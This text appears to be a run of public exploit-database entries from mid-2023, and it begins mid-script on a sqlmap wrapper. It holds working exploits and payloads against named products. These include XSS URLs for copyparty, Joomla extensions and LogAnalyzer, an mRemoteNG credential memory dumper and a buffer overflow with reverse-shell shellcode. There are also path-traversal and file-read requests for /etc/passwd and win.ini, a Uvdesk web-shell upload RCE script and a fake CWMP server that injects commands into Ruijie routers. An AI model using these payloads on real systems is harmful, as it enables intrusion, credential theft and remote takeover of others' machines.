--current-db Retrieve DBMS current database') print(' --passwords Enumerate DBMS users password hashes') print(' --tables Enumerate DBMS database tables') print(' --columns Enumerate DBMS database table column') print(' --schema Enumerate DBMS schema') print(' --dump Dump DBMS database table entries') print(' --dump-all Dump all DBMS databases tables entries') retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ') exploitcode = exploitcode_url + exploitcode_risk + exploitcode_cookie + retrieve_mode + ' -p id -v 0 --answers="follow=Y" --batch' os.system(exploitcode) print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))

# Exploit Title: copyparty v1.8.6 - Reflected Cross Site Scripting (XSS) # Date: 23/07/2023 # Exploit Author: Vartamtezidis Theodoros (@TheHackyDog) # Vendor Homepage: https://github.com/9001/copyparty/ # Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.6 # Version: <=1.8.6 # Tested on: Debian Linux # CVE : CVE-2023-38501 #Description Copyparty is a portable file server. Versions prior to 1.8.6 are subject to a reflected cross-site scripting (XSS) Attack. Vulnerability that exists in the web interface of the application could allow an attacker to execute malicious javascript code by tricking users into accessing a malicious link. #POC https://localhost:3923/?k304=y%0D%0A%0D%0A%3Cimg+src%3Dcopyparty+onerror%3Dalert(1)%3E

# Exploit Title: mRemoteNG v1.77.3.1784-NB - Cleartext Storage of Sensitive Information in Memory # Google Dork: - # Date: 21.07.2023 # Exploit Author: Maximilian Barz # Vendor Homepage: https://mremoteng.org/ # Software Link: https://mremoteng.org/download # Version: mRemoteNG <= v1.77.3.1784-NB # Tested on: Windows 11 # CVE : CVE-2023-30367 /* Multi-Remote Next Generation Connection Manager (mRemoteNG) is free software that enables users to store and manage multi-protocol connection configurations to remotely connect to systems. mRemoteNG configuration files can be stored in an encrypted state on disk. mRemoteNG version <= v1.76.20 and <= 1.77.3-dev loads configuration files in plain text into memory (after decrypting them if necessary) at application start-up, even if no connection has been established yet. This allows attackers to access contents of configuration files in plain text through a memory dump and thus compromise user credentials when no custom password encryption key has been set. This also bypasses the connection configuration file encryption setting by dumping already decrypted configurations from memory. Full Exploit and mRemoteNG config file decryption + password bruteforce python script: https://github.com/S1lkys/CVE-2023-30367-mRemoteNG-password-dumper */ using System; using System.Collections; using System.Collections.Generic; using System.Diagnostics; using System.IO; using System.Reflection; using System.Runtime.InteropServices; using System.Text; using System.Text.RegularExpressions; namespace mRemoteNGDumper { public static class Program { public enum MINIDUMP_TYPE { MiniDumpWithFullMemory = 0x00000002 } [StructLayout(LayoutKind.Sequential, Pack = 4)] public struct MINIDUMP_EXCEPTION_INFORMATION { public uint ThreadId; public IntPtr ExceptionPointers; public int ClientPointers; } [DllImport("kernel32.dll")] static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId); [DllImport("Dbghelp.dll")] static extern bool MiniDumpWriteDump(IntPtr hProcess, uint ProcessId, SafeHandle hFile, MINIDUMP_TYPE DumpType, ref MINIDUMP_EXCEPTION_INFORMATION ExceptionParam, IntPtr UserStreamParam, IntPtr CallbackParam); static void Main(string[] args) { string input; bool configfound = false; StringBuilder filesb; StringBuilder linesb; List<string> configs = new List<string>(); Process[] localByName = Process.GetProcessesByName("mRemoteNG"); if (localByName.Length == 0) { Console.WriteLine("[-] No mRemoteNG process was found. Exiting"); System.Environment.Exit(1); } string assemblyPath = Assembly.GetEntryAssembly().Location; Console.WriteLine("[+] Creating a memory dump of mRemoteNG using PID {0}.", localByName[0].Id); string dumpFileName = assemblyPath + "_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm.ss") + ".dmp"; FileStream procdumpFileStream = File.Create(dumpFileName); MINIDUMP_EXCEPTION_INFORMATION info = new MINIDUMP_EXCEPTION_INFORMATION(); // A full memory dump is necessary in the case of a managed application, other wise no information // regarding the managed code will be available MINIDUMP_TYPE DumpType = MINIDUMP_TYPE.MiniDumpWithFullMemory; MiniDumpWriteDump(localByName[0].Handle, (uint)localByName[0].Id, procdumpFileStream.SafeFileHandle, DumpType, ref info, IntPtr.Zero, IntPtr.Zero); procdumpFileStream.Close(); filesb = new StringBuilder(); Console.WriteLine("[+] Searching for configuration files in memory dump."); using (StreamReader reader = new StreamReader(dumpFileName)) { while (reader.Peek() >= 0) { input = reader.ReadLine(); string pattern = @"(\<Node)(.*)(?=\/>)\/>"; Match m = Regex.Match(input, pattern, RegexOptions.IgnoreCase); if (m.Success) { configfound = true; foreach (string config in m.Value.Split('>')) { configs.Add(config); } } } reader.Close(); if (configfound) { string currentDir = System.IO.Directory.GetCurrentDirectory(); string dumpdir = currentDir + "/dump"; if (!Directory.Exists(dumpdir)) { Directory.CreateDirectory(dumpdir); } string savefilepath; for (int i =0; i < configs.Count;i++) { if (!string.IsNullOrEmpty(configs[i])) { savefilepath = currentDir + "\\dump\\extracted_Configfile_mRemoteNG_" + i+"_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml"; Console.WriteLine("[+] Saving extracted configuration file to: " + savefilepath); using (StreamWriter writer = new StreamWriter(savefilepath)) { writer.Write(configs[i]+'>'); writer.Close(); } } } Console.WriteLine("[+] Done!"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); Console.WriteLine("[+] To decrypt mRemoteNG configuration files and get passwords in cleartext, execute: mremoteng_decrypt.py\r\n Example: python3 mremoteng_decrypt.py -rf \""+ currentDir + "\\dump\\extracted_Configfile_mRemoteNG_0_" + DateTime.Now.ToString("dd.MM.yyyy.HH.mm") + "_confCons.xml\"" ); } else { Console.WriteLine("[-] No configuration file found in memorydump. Exiting"); Console.WriteLine("[+] Deleting memorydump file!"); File.Delete(dumpFileName); } } } } }

# Exploit Title: Joomla Solidres 2.13.3 - Reflected XSS # Exploit Author: CraCkEr # Date: 28/07/2023 # Vendor: Solidres Team # Vendor Homepage: http://solidres.com/ # Software Link: https://extensions.joomla.org/extension/vertical-markets/booking-a-reservations/solidres/ # Demo: http://demo.solidres.com/joomla # Version: 2.13.3 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials GET parameter 'show' is vulnerable to XSS GET parameter 'reviews' is vulnerable to XSS GET parameter 'type_id' is vulnerable to XSS GET parameter 'distance' is vulnerable to XSS GET parameter 'facilities' is vulnerable to XSS GET parameter 'categories' is vulnerable to XSS GET parameter 'prices' is vulnerable to XSS GET parameter 'location' is vulnerable to XSS GET parameter 'Itemid' is vulnerable to XSS https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=[XSS] https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&reviews=[XSS]&facilities=18& https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=[XSS]&facilities=14 https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=306&a0b5056f4a0135d4f5296839591a088a=1distance=0-25&distance=0-25&categories=[XSS] https://website/joomla/greenery_hub/index.php?option=com_solidres&task=hub.updateFilter&location=d2tff&ordering=distance&direction=asc&prices=[XSS] https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=[XSS]&task=hub.search&ordering=score&direction=desc&type_id=11 https://website/joomla/greenery_hub/index.php/en/hotels/reservations?location=italy&checkin=27-07-2023&checkout=28-07-2023&option=com_solidres&task=hub.search&Itemid=[XSS]&a0b5056f4a0135d4f5296839591a088a=1distance=0-11&distance=0-11&facilities=14 [-] Done

# Exploit Title: General Device Manager 2.5.2.2 - Buffer Overflow (SEH) # Date: 30.07.2023 # Software Link: https://download.xm030.cn/d/MDAwMDA2NTQ= # Software Link 2: https://www.maxiguvenlik.com/uploads/importfiles/General_DeviceManager.zip # Exploit Author: Ahmet Ümit BAYRAM # Tested Version: 2.5.2.2 # Tested on: Windows 10 64bit # 1.- Run python code : exploit.py # 2.- Open pwned.txt and copy all content to clipboard # 3.- Open Device Manage and press Add Device # 4.- Paste the content of pwned.txt into the 'IP Address' # 5.- Click 'OK' # 6.- nc.exe local IP Port 1337 and you will have a bind shell # 7.- R.I.P. Condor <3 import struct offset = b"A" * 1308 nseh = b"\xEB\x06\x90\x90" # jmp short seh = struct.pack('<I', 0x10081827) # 0x10081827 : pop ebx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [NetSDK.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.0.8.66 (C:\Program Files (x86)\DeviceManage\NetSDK.dll) nops = b"\x90" * 32 #shellcode: msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=1337 EXITFUNC=thread -a x86 --platform windows -b "\x00\x0a\x0d" -f python --var-name shellcode shellcode = b"" shellcode += b"\xd9\xc6\xbb\xae\xc7\xed\x8e\xd9\x74\x24\xf4" shellcode += b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x13" shellcode += b"\x03\xf4\xd4\x0f\x7b\xf4\x33\x4d\x84\x04\xc4" shellcode += b"\x32\x0c\xe1\xf5\x72\x6a\x62\xa5\x42\xf8\x26" shellcode += b"\x4a\x28\xac\xd2\xd9\x5c\x79\xd5\x6a\xea\x5f" shellcode += b"\xd8\x6b\x47\xa3\x7b\xe8\x9a\xf0\x5b\xd1\x54" shellcode += b"\x05\x9a\x16\x88\xe4\xce\xcf\xc6\x5b\xfe\x64" shellcode += b"\x92\x67\x75\x36\x32\xe0\x6a\x8f\x35\xc1\x3d" shellcode += b"\x9b\x6f\xc1\xbc\x48\x04\x48\xa6\x8d\x21\x02" shellcode += b"\x5d\x65\xdd\x95\xb7\xb7\x1e\x39\xf6\x77\xed" shellcode += b"\x43\x3f\xbf\x0e\x36\x49\xc3\xb3\x41\x8e\xb9" shellcode += b"\x6f\xc7\x14\x19\xfb\x7f\xf0\x9b\x28\x19\x73" shellcode += b"\x97\x85\x6d\xdb\xb4\x18\xa1\x50\xc0\x91\x44" shellcode += b"\xb6\x40\xe1\x62\x12\x08\xb1\x0b\x03\xf4\x14" shellcode += b"\x33\x53\x57\xc8\x91\x18\x7a\x1d\xa8\x43\x13" shellcode += b"\xd2\x81\x7b\xe3\x7c\x91\x08\xd1\x23\x09\x86" shellcode += b"\x59\xab\x97\x51\x9d\x86\x60\xcd\x60\x29\x91" shellcode += b"\xc4\xa6\x7d\xc1\x7e\x0e\xfe\x8a\x7e\xaf\x2b" shellcode += b"\x1c\x2e\x1f\x84\xdd\x9e\xdf\x74\xb6\xf4\xef" shellcode += b"\xab\xa6\xf7\x25\xc4\x4d\x02\xae\x94\x91\x0c" shellcode += b"\x2f\x03\x90\x0c\x2a\xea\x1d\xea\x5e\x1c\x48" shellcode += b"\xa5\xf6\x85\xd1\x3d\x66\x49\xcc\x38\xa8\xc1" shellcode += b"\xe3\xbd\x67\x22\x89\xad\x10\xc2\xc4\x8f\xb7" shellcode += b"\xdd\xf2\xa7\x54\x4f\x99\x37\x12\x6c\x36\x60" shellcode += b"\x73\x42\x4f\xe4\x69\xfd\xf9\x1a\x70\x9b\xc2" shellcode += b"\x9e\xaf\x58\xcc\x1f\x3d\xe4\xea\x0f\xfb\xe5" shellcode += b"\xb6\x7b\x53\xb0\x60\xd5\x15\x6a\xc3\x8f\xcf" shellcode += b"\xc1\x8d\x47\x89\x29\x0e\x11\x96\x67\xf8\xfd" shellcode += b"\x27\xde\xbd\x02\x87\xb6\x49\x7b\xf5\x26\xb5" shellcode += b"\x56\xbd\x47\x54\x72\xc8\xef\xc1\x17\x71\x72" shellcode += b"\xf2\xc2\xb6\x8b\x71\xe6\x46\x68\x69\x83\x43" shellcode += b"\x34\x2d\x78\x3e\x25\xd8\x7e\xed\x46\xc9" final_payload = offset + nseh + seh + nops + shellcode # write the final payload to a file try: with open('pwned.txt', 'wb') as f: print("[+] Creating %s bytes evil payload..." %len(final_payload)) f.write(final_payload) f.close() print("[+] File created!") except: print("File cannot be created!")

# Exploit Title: copyparty 1.8.2 - Directory Traversal # Date: 14/07/2023 # Exploit Author: Vartamtzidis Theodoros (@TheHackyDog) # Vendor Homepage: https://github.com/9001/copyparty/ # Software Link: https://github.com/9001/copyparty/releases/tag/v1.8.2 # Version: <=1.8.2 # Tested on: Debian Linux # CVE : CVE-2023-37474 #Description Copyparty is a portable file server. Versions prior to 1.8.2 are subject to a path traversal vulnerability detected in the `.cpr` subfolder. The Path Traversal attack technique allows an attacker access to files, directories, and commands that reside outside the web document root directory. #POC curl -i -s -k -X GET 'http://127.0.0.1:3923/.cpr/%2Fetc%2Fpasswd'

# Exploit Title: Adiscon LogAnalyzer v.4.1.13 - Cross Site Scripting # Date: 2023.Aug.01 # Exploit Author: Pedro (ISSDU TW) # Vendor Homepage: https://loganalyzer.adiscon.com/ # Software Link: https://loganalyzer.adiscon.com/download/ # Version: v4.1.13 and before # Tested on: Linux # CVE : CVE-2023-36306 There are several installation method. If you installed without database(File-Based),No need to login. If you installed with database, You should login with Read Only User(at least) XSS Payloads are as below: XSS http://[ip address]/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E http://[ip address]/loganalyzer/chartgenerator.php?type=2&byfield=syslogseverity&width=400&%%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E=123 http://[ip address]/loganalyzer/details.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/index.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/search.php/%22%3E%3Cscript%3Ealert('xss')%3C/script%3E http://[ip address]/loganalyzer/export.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/reports.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E http://[ip address]/loganalyzer/statistics.php/%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E

# Exploit Title: Joomla iProperty Real Estate 4.1.1 - Reflected XSS # Exploit Author: CraCkEr # Date: 29/07/2023 # Vendor: The Thinkery LLC # Vendor Homepage: http://thethinkery.net # Software Link: https://extensions.joomla.org/extension/vertical-markets/real-estate/iproperty/ # Demo: https://iproperty.thethinkery.net/ # Version: 4.1.1 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /iproperty/property-views/all-properties-with-map GET parameter 'filter_keyword' is vulnerable to XSS https://website/iproperty/property-views/all-properties-with-map?filter_keyword=[XSS]&option=com_iproperty&view=allproperties&ipquicksearch=1 XSS Payload: pihil"onmouseover="alert(1)"style="position:absolute;width:100%;height:100%;top:0;left:0;"f63m4 [-] Done

# Exploit Title: Uvdesk v1.1.3 - File Upload Remote Code Execution (RCE) (Authenticated) # Date: 28/07/2023 # Exploit Author: Daniel Barros (@cupc4k3d) - Hakai Offensive Security # Vendor Homepage: https://www.uvdesk.com # Software Link: https://github.com/uvdesk/community-skeleton # Version: 1.1.3 # Example: python3 CVE-2023-39147.py -u "http://$ip:8000/" -c "whoami" # CVE : CVE-2023-39147 # Tested on: Ubuntu 20.04.6 import requests import argparse def get_args(): parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', required=True, action='store', help='Target url') parser.add_argument('-c', '--command', required=True, action='store', help='Command to execute') my_args = parser.parse_args() return my_args def main(): args = get_args() base_url = args.url command = args.command uploaded_file = "shell.php" url_cmd = base_url + "//assets/knowledgebase/shell.php?cmd=" + command # Edit your credentials here login_data = { "_username": "admin@adm.com", "_password": "passwd", "_remember_me": "off" } files = { "name": (None, "pwn"), "description": (None, "xxt"), "visibility": (None, "public"), "solutionImage": (uploaded_file, "<?php system($_GET['cmd']); ?>", "image/jpg") } s = requests.session() # Login s.post(base_url + "/en/member/login", data=login_data) # Upload upload_response = s.post(base_url + "/en/member/knowledgebase/folders/new", files=files) # Execute command cmd = s.get(url_cmd) print(cmd.text) if __name__ == "__main__": main()

# Exploit Title: ReyeeOS 1.204.1614 - MITM Remote Code Execution (RCE) # Google Dork: None # Date: July 31, 2023 # Exploit Author: Riyan Firmansyah of Seclab # Vendor Homepage: https://ruijienetworks.com # Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 # Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) # Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO # CVE : None """ Summary ======= The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. """ #!/usr/bin/env python3 # -*- coding: utf-8 -*- from html import escape, unescape import http.server import socketserver import io import time import re import argparse import gzip # command payload command = "uname -a" # change this to serve on a different port PORT = 8080 def cwmp_inform(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) product_class = re.search(r"(?:<ProductClass.*?>)(.*?)(?:<\/ProductClass>)", soap).group(1) serial_number = re.search(r"(?:<SerialNumber.*?>)(.*?)(?:<\/SerialNumber>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} parameters = re.findall(r"(?:<P>)(.*?)(?:<\/P>)", soap) for parameter in parameters: parameter_name = re.search(r"(?:<N>)(.*?)(?:<\/N>)", parameter).group(1) parameter_value = re.search(r"(?:<V>)(.*?)(?:<\/V>)", parameter).group(1) result['parameters'][parameter_name] = parameter_value return result def cwmp_inform_response(): return """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">16</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:InformResponse><MaxEnvelopes>1</MaxEnvelopes></cwmp:InformResponse></SOAP-ENV:Body></SOAP-ENV:Envelope>""" def command_payload(command): current_time = time.time() result = """<?xml version='1.0' encoding='UTF-8'?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:cwmp="urn:dslforum-org:cwmp-1-0" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><SOAP-ENV:Header><cwmp:ID SOAP-ENV:mustUnderstand="1">ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}</cwmp:ID><cwmp:NoMoreRequests>1</cwmp:NoMoreRequests></SOAP-ENV:Header><SOAP-ENV:Body><cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand><Mode>config</Mode><CommandList SOAP-ENC:arrayType="xsd:string[1]"><Command>{command}</Command></CommandList></cwmp:X_RUIJIE_COM_CN_ExecuteCliCommand></SOAP-ENV:Body></SOAP-ENV:Envelope>""".format(cur_time=current_time, command=command) return result def command_response(soap): cwmp_id = re.search(r"(?:<cwmp:ID.*?>)(.*?)(?:<\/cwmp:ID>)", soap).group(1) command = re.search(r"(?:<Command>)(.*?)(?:<\/Command>)", soap).group(1) response = re.search(r"(?:<Response>)((\n|.)*?)(?:<\/Response>)", soap).group(1) result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} return result class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): protocol_version = 'HTTP/1.1' def do_GET(self): self.send_response(204) self.end_headers() def do_POST(self): print("[*] Got hit by", self.client_address) f = io.BytesIO() if 'service' in self.path: stage, info = self.parse_stage() if stage == "cwmp_inform": self.send_response(200) print("[!] Got Device information", self.client_address) print("[*] Product Class:", info['product_class']) print("[*] Serial Number:", info['serial_number']) print("[*] MAC Address:", info['parameters']['mac']) print("[*] STUN Client IP:", info['parameters']['stunclientip']) payload = bytes(cwmp_inform_response(), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) elif stage == "command_request": self.send_response(200) self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") print("[*] Device interacting", self.client_address) print(info) payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') f.write(payload) self.send_header("Content-Length", str(f.tell())) else: print("[*] Command response", self.client_address) print(unescape(info['response'])) self.send_response(204) f.write(b"") else: print("[x] Received invalid request", self.client_address) self.send_response(204) f.write(b"") f.seek(0) self.send_header("Connection", "keep-alive") self.send_header("Content-type", "text/xml;charset=utf-8") self.end_headers() if f: self.copyfile(f, self.wfile) f.close() def parse_stage(self): content_length = int(self.headers['Content-Length']) post_data = gzip.decompress(self.rfile.read(content_length)) if "cwmp:Inform" in post_data.decode("utf-8"): return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): return ("command_response", command_response(post_data.decode("utf-8"))) else: return ("command_request", "Ping!") def log_message(self, format, *args): return if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', help='Specify alternate bind address ' '[default: all interfaces]') parser.add_argument('port', action='store', default=PORT, type=int, nargs='?', help='Specify alternate port [default: {}]'.format(PORT)) args = parser.parse_args() Handler = CustomHTTPRequestHandler with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: ip_addr = args.bind if args.bind != '' else '0.0.0.0' print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() """ Output ====== ubuntu:~$ python3 exploit.py [!] serving fake CWMP server at 0.0.0.0:8080 [*] Got hit by ('[redacted]', [redacted]) [!] Got Device information ('[redacted]', [redacted]) [*] Product Class: EW1200G-PRO [*] Serial Number: [redacted] [*] MAC Address: [redacted] [*] STUN Client IP: [redacted]:[redacted] [*] Got hit by ('[redacted]', [redacted]) [*] Device interacting ('[redacted]', [redacted]) Ping! [*] Got hit by ('[redacted]', [redacted]) [*] Command response ('[redacted]', [redacted]) PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms 64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms 64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms --- 127.0.0.1 ping statistics --- 4 packets transmitted, 4 packets received, 0% packet loss round-trip min/avg/max = 0.300/0.335/0.400 ms Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux """

# Exploit Title: JLex GuestBook 1.6.4 - Reflected XSS # Exploit Author: CraCkEr # Date: 01/08/2023 # Vendor: JLexArt # Vendor Homepage: https://jlexart.com/ # Software Link: https://extensions.joomla.org/extension/contacts-and-feedback/guest-book/jlex-guestbook/ # Demo: https://jlexguestbook.jlexart.com/ # Version: 1.6.4 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Greetings The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka CryptoJob (Twitter) twitter.com/0x0CryptoJob ## Description The attacker can send to victim a link containing a malicious URL in an email or instant message can perform a wide variety of actions, such as stealing the victim's session token or login credentials Path: /u/perry-705 GET parameter 'q' is vulnerable to XSS http://website/u/perry-705?q=[XSS]&wl=1 XSS Payloads: db8ck"onfocus="confirm(1)"autofocus="xwu0k

# Exploit Title: Ozeki 10 SMS Gateway 10.3.208 - Arbitrary File Read (Unauthenticated) # Date: 01.08.2023 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://ozeki-sms-gateway.com # Software Link: https://ozeki-sms-gateway.com/attachments/702/installwindows_1689352737_OzekiSMSGateway_10.3.208.zip # Version: 10.3.208 # Tested on: Windows 10 ##################################### Arbitrary File Read PoC ##################################### curl https://localhost:9515/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fwindows/win.ini ##################################### Arbitrary File Read PoC #####################################